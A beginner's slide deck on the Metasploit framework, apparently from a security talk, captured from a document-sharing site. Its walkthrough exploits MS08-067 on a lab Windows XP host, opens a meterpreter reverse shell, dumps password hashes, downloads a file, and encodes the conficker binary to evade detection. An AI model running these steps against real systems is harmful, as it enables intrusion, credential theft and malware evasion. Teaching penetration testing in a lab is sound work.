Metasploit 101

Metasploit 101
By: Metacortex
For:
Audience:
- People who haven't used metasploit before or
know what it is
- People looking to maybe learn some new
features of metasploit
- Nubs
What is Metasploit?
Metasploit is an exploitation framework. It is an
all in one toolkit for everything pentesters,
researchers, and exploit developers need.
Written in Ruby
Open Source
Highly extensible and customizable
Originally written by HD Moore
Maintained by Rapid7 Developers
Getting Metasploit
Best way to get a hold of it is to grab it off SVN
Available already installed in BackTrack
Can download pre packaged versions
Linux Prerequisites
To run Metasploit, you need Ruby and
Rubygems.
dc@801:~/metasploit$ sudo aptitude install ruby rubygems
The following NEW packages will be installed:
libruby1.8{a} ruby ruby1.8{a} ruby1.8-dev{a} rubygems
rubygems1.8{a}
0 packages upgraded, 6 newly installed, 0 to remove and 0 not
upgraded.
Need to get 2,622 kB of archives. After unpacking 11.0 MB will be
used.
Do you want to continue? [Y/n/?] y
SVN Download
dc@801:~/metasploit$ svn co https://www.metasploit.com/svn/framework3/trunk/
A trunk/msfelfscan
A trunk/scripts
A trunk/scripts/ps
A trunk/scripts/ps/msflag.ps1
A trunk/scripts/resource
...
A trunk/documentation/rpm
A trunk/documentation/rpm/metasploit.spec
U trunk
Checked out revision 15702.
SVN Update
dc@801:~/metasploit/trunk$ svn update
U external/source/meterpreter/source/extensions/priv/server/priv.c
U external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
U external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
...
U HACKING
D documentation/users_guide.pdf
A documentation/Gemfile
A documentation/users_guide_4.2.pdf
A documentation/users_guide_4.3.pdf
Updated to revision 15703.
Download binaries
Do that at
http://www.metasploit.com/download/
What do you get?

dc@801:~/metasploit/trunk$ ls
armitage
HACKING msfd
msfpescan plugins tools
COPYING lib
msfelfscan msfrop README.md
data
modules
msfencode msfrpc scripts
documentation msfbinscan msfgui
msfrpcd spec
external
msfcli msfmachscan msfupdate test
Gemfile
msfconsole msfpayload msfvenom THIRDPARTY.md
A whole lot of stuff
msfconsole
armitage
HACKING msfd
msfpescan plugins tools
COPYING lib
msfelfscan msfrop README.md
data
modules
msfencode msfrpc scripts
documentation msfbinscan msfgui
msfrpcd spec
external
msfcli msfmachscan msfupdate test
Gemfile
msfconsole msfpayload msfvenom THIRDPARTY.md
But we are really interested in msfconsole
msfconsole
dc@801:~/metasploit/trunk$ sudo ./msfconsole
[sudo] password for dc:
,
,
/
\
((__---,,,---__))
(_) O O (_)_______
\_/
|\
o_o \ M S F | \
\ _____ | *
||| WW|||
|||
|||
=[ metasploit v4.4.0-release [core:4.4 api:1.0]

+ -- --=[ 922 exploits - 496 auxiliary - 150 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15704 updated today (2012.08.04)
msf >
msfconsole help
msf > help
Core Commands
=============
Command
------?
back
banner
cd
color
connect
exit
help
info
irb
jobs
...
Description
----------Help menu
Move back from the current context
Display an awesome metasploit banner
Change the current working directory
Toggle color
Communicate with a host
Exit the console
Help menu
Displays information about one or more module
Drop into irb scripting mode
Displays and manages jobs
msfconsole search
msf > search ms08_067
Matching Modules
================
Name
Disclosure Date Rank Description
------------------ ---- ----------exploit/windows/smb/ms08_067_netapi 2008-10-28
great Microsoft Server Service
Relative Path Stack Corruption
Nmap
msf > nmap -A 192.168.0.107
[*] exec: nmap -A 192.168.0.107
Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT

Nmap scan report for 192.168.0.107
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT
STATE SERVICE
VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows
Exploits and Payloads

Exploit: Code that leverages a certain vulnerability
Payload: Code that gets placed on the system post
exploitation
Selecting an Exploit
Once you have identified a vulnerability that has an
exploit in metasploit, lets go ahead and use it.
In this example, we are going against a fresh instal
of Windows XP SP2
XP SP2 is notorious for MS08-067 (the bug conficker
used)
The MS08-067 is a super reliable
exploit so we will use it
Exploit Options
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting
-----------------RHOST
RPORT 445
SMBPIPE BROWSER
Exploit target:
Id Name
-- ---0 Automatic Targeting
Required Description
-----------------yes
The target address
yes
Set the SMB service port
yes
The pipe name to use (BROWSER, SRVSVC)
Available Payloads
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name
Disclosure Date Rank Description
------------------ ---- ----------generic/custom
normal Custom Payload
generic/debug_trap
normal Generic x86 Debug Trap
generic/shell_bind_tcp
...
Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports
normal VNC Server (Reflective
Injection), Reverse All-Port TCP Stager
Select Payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
Show Exploit Options

Name
Current Setting Required Description
----------------------------------RHOST
yes The target address
RPORT 445
yes Set the SMB service port
SMBPIPE BROWSER
yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name
----------------------------------EXITFUNC thread
yes Exit technique: process, none, seh, thread
LHOST
yes The listen address
LPORT 4444
yes The listen port
Exploit target:
Id Name
Set Exploit Options

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.107
RHOST => 192.168.0.107
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
Verify Options
Name
----------------------------------RHOST 192.168.0.107 yes The target address
RPORT 445
yes Set the SMB service port
SMBPIPE BROWSER
yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name
----------------------------------EXITFUNC thread
yes Exit technique: process, none, seh, thread
LHOST 192.168.0.101 yes The listen address
LPORT 4444
yes The listen port
Exploit target:
Id Name
EXPLOIT!
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.101:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.0.107
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug
04 00:43:16 -0600 2012
meterpreter >
Basic Meterpreter
meterpreter > ifconfig
Interface 1
============
Name
: MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU
: 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 2
============
Name
: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU
: 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0
Interface 2
============
Name
: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU
: 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0
Basic Meterpreter
meterpreter > hashdump
Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:
2a19baf0800172a7622217c273064e3a:::
Basic Meterpreter
meterpreter > search -f *credit*
Found 2 results...
c:\\Documents and Settings\dc801-1\Desktop\CreditCardData.txt (16 bytes)
c:\\Documents and Settings\dc801-1\Recent\CreditCardData.lnk (519 bytes)
meterpreter > cd C:\\
meterpreter > cd Documents\ and\ Settings
meterpreter > cd dc801-1
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\dc801-1\Desktop
==================================================
Mode
Size Type Last modified
Name
------- ---- ---------------40777/rwxrwxrwx 0 dir Sun Aug 05 13:07:32 -0600 2012 .
40777/rwxrwxrwx 0 dir Sat Aug 04 00:18:30 -0600 2012 ..
100666/rw-rw-rw- 16 fil Sun Aug 05 13:08:20 -0600 2012 CreditCardData.txt
meterpreter > download CreditCardData.txt
[*] downloading: CreditCardData.txt -> CreditCardData.txt
[*] downloaded : CreditCardData.txt -> CreditCardData.txt
Basic Meterpreter
armitage
HACKING msfelfscan msfrpc
spec
COPYING
lib
msfencode msfrpcd
test
CreditCardData.txt modules
msfgui
msfupdate THIRD-PARTY.md
data
msfbinscan msfmachscan msfvenom tools
documentation msfcli
msfpayload plugins
external
msfconsole msfpescan
README.md
Gemfile
msfd
msfrop
scripts
dc@801:~/metasploit/trunk$ cat CreditCardData.txt
not really. lulz
dc@801:~/metasploit/trunk$
MSFEncode
MSFEncode
dc@801:~/metasploit/trunk$ ./msfencode -i conficker.EXE -o notconficker.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 86045 (iteration=1)
MSFEncode file size jump

dc@801:~/metasploit/trunk$ ls -alh *conficker*
-rw-r--r-- 1 dc dc 84K 2012-08-29 13:23 conficker.EXE
-rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe
MSFEncode

Metasploit 101

Caricato da

Informazioni sul documento

Titolo originale

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Metasploit 101

Caricato da

Copyright:

Formati disponibili

Metasploit 101

What do you get?

A whole lot of stuff

But we are really interested in msfconsole

=[ metasploit v4.4.0-release [core:4.4 api:1.0]

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT

Exploits and Payloads

Show Exploit Options

Set Exploit Options

MSFEncode file size jump

Potrebbero piacerti anche